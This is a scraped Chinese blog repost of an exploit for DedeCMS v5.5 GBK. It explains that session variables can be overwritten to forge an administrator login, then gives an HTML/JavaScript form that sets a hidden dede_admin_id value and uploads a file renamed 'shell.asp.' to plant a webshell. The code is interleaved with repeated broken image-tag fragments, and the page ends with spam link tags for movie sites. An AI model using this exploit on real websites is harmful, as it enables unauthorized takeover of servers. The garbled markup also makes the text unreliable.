DEDECMS v5.5 GBK Final 的一个鸡肋漏洞

Home » 技术教程 » DEDECMS v5.5 GBK Final 的一个鸡肋漏洞
在session.auto_start开启的情况下可以任意覆盖$_SESSION变量,我们可以伪造管理员登录并上传文件/DedeCmsV55-GBK-Final/uploads/include/dialog/select_soft_post.php上传时重命名为 *.php.即可绕过检查上传shellexp:650) this.width=650;” onclick=’window.open(“http://blog.51cto.com/viewpic.php?refimg=” + this.src)’ align=”top” src=”http://cdn.verydemo.com/upload/2012_11_23/13536557244420.gif” /><form action=”” method=’POST’ enctype=”multipart/form-data”> 650) this.width=650;” onclick=’window.open(“http://blog.51cto.com/viewpic.php?refimg=” + this.src)’ align=”top” src=”http://cdn.verydemo.com/upload/2012_11_23/13536557244420.gif” />URL:<input type=”text” name=”target” size=”50″ value=”http://192.168.1.110″> 650) this.width=650;” onclick=’window.open(“http://blog.51cto.com/viewpic.php?refimg=” + this.src)’ align=”top” src=”http://cdn.verydemo.com/upload/2012_11_23/13536557244420.gif” />Path:<input type=”text” name=”path” value=”/DedeCmsV55-GBK-Final/uploads/include/dialog/select_soft_post.php” size=”90″><br> 650) this.width=650;” onclick=’window.open(“http://blog.51cto.com/viewpic.php?refimg=” + this.src)’ align=”top” src=”http://cdn.verydemo.com/upload/2012_11_23/13536557244420.gif” />File:<input type=’file’ name=’uploadfile’ size=’25’ />(Filetype must be GIF/JPEG etc) 650) this.width=650;” onclick=’window.open(“http://blog.51cto.com/viewpic.php?refimg=” + this.src)’ align=”top” src=”http://cdn.verydemo.com/upload/2012_11_23/13536557244420.gif” />RenameTo:<input type=’test’ name=’newname’ value=”shell.asp.”/><br> 650) this.width=650;” onclick=’window.open(“http://blog.51cto.com/viewpic.php?refimg=” + this.src)’ align=”top” src=”http://cdn.verydemo.com/upload/2012_11_23/13536557244420.gif” /> 650) this.width=650;” onclick=’window.open(“http://blog.51cto.com/viewpic.php?refimg=” + this.src)’ align=”top” src=”http://cdn.verydemo.com/upload/2012_11_23/13536557244420.gif” /><input type=hidden name=”_SESSION[dede_admin_id]” value=1> 650) this.width=650;” onclick=’window.open(“http://blog.51cto.com/viewpic.php?refimg=” + this.src)’ align=”top” src=”http://cdn.verydemo.com/upload/2012_11_23/13536557244420.gif” /><input type=hidden name=”bkurl” value=1> 650) this.width=650;” onclick=’window.open(“http://blog.51cto.com/viewpic.php?refimg=” + this.src)’ align=”top” src=”http://cdn.verydemo.com/upload/2012_11_23/13536557244420.gif” /><input type=’button’ value=’submit’ onclick=”fsubmit()”/><br><br><br><br><br><br> 650) this.width=650;” onclick=’window.open(“http://blog.51cto.com/viewpic.php?refimg=” + this.src)’ align=”top” src=”http://cdn.verydemo.com/upload/2012_11_23/13536557244420.gif” />dedecms 0day exp..<br> 650) this.width=650;” onclick=’window.open(“http://blog.51cto.com/viewpic.php?refimg=” + this.src)’ align=”top” src=”http://cdn.verydemo.com/upload/2012_11_23/13536557244420.gif” />need: session.auto_start = 1<br> 650) this.width=650;” onclick=’window.open(“http://blog.51cto.com/viewpic.php?refimg=” + this.src)’ align=”top” src=”http://cdn.verydemo.com/upload/2012_11_23/13536557244420.gif” />By toby572010/2/22 650) this.width=650;” onclick=’window.open(“http://blog.51cto.com/viewpic.php?refimg=” + this.src)’ align=”top” src=”http://cdn.verydemo.com/upload/2012_11_23/13536557244420.gif” /></form> 650) this.width=650;” onclick=’window.open(“http://blog.51cto.com/viewpic.php?refimg=” + this.src)’ align=”top” src=”http://cdn.verydemo.com/upload/2012_11_23/13536557244420.gif” /><script> 650) this.width=650;” onclick=’window.open(“http://blog.51cto.com/viewpic.php?refimg=” + this.src)’ align=”top” src=”http://cdn.verydemo.com/upload/2012_11_23/13536557244420.gif” />function fsubmit(){ 650) this.width=650;” onclick=’window.open(“http://blog.51cto.com/viewpic.php?refimg=” + this.src)’ align=”top” src=”http://cdn.verydemo.com/upload/2012_11_23/13536557244420.gif” />var form = document.forms[0]; 650) this.width=650;” onclick=’window.open(“http://blog.51cto.com/viewpic.php?refimg=” + this.src)’ align=”top” src=”http://cdn.verydemo.com/upload/2012_11_23/13536557244420.gif” />form.action = form.target.value + form.path.value; 650) this.width=650;” onclick=’window.open(“http://blog.51cto.com/viewpic.php?refimg=” + this.src)’ align=”top” src=”http://cdn.verydemo.com/upload/2012_11_23/13536557244420.gif” />tmpstr = form.target.value +’/’+ form.newname.value; 650) this.width=650;” onclick=’window.open(“http://blog.51cto.com/viewpic.php?refimg=” + this.src)’ align=”top” src=”http://cdn.verydemo.com/upload/2012_11_23/13536557244420.gif” />form.bkurl.value = tmpstr.substr(0,tmpstr.length-1); 650) this.width=650;” onclick=’window.open(“http://blog.51cto.com/viewpic.php?refimg=” + this.src)’ align=”top” src=”http://cdn.verydemo.com/upload/2012_11_23/13536557244420.gif” />form.submit(); 650) this.width=650;” onclick=’window.open(“http://blog.51cto.com/viewpic.php?refimg=” + this.src)’ align=”top” src=”http://cdn.verydemo.com/upload/2012_11_23/13536557244420.gif” />} 650) this.width=650;” onclick=’window.open(“http://blog.51cto.com/viewpic.php?refimg=” + this.src)’ align=”top” src=”http://cdn.verydemo.com/upload/2012_11_23/13536557244420.gif” /></script> 你并不一定会从此拥有更美好的人生,

DEDECMS v5.5 GBK Final 的一个鸡肋漏洞

相关文章:

你感兴趣的文章:

标签云:

亚洲高清电影在线, 免费高清电影, 八戒影院夜间, 八戒电影最新大片, 出轨在线电影, 午夜电影院, 在线影院a1166, 在线电影院, 在线观看美剧下载, 日本爱情电影, 日韩高清电影在线, 电影天堂网, 直播盒子app, 聚合直播, 高清美剧, 高清美剧在线观看 EhViewer-E站, E站, E站绿色版, qqmulu.com, qq目录网, qq网站目录,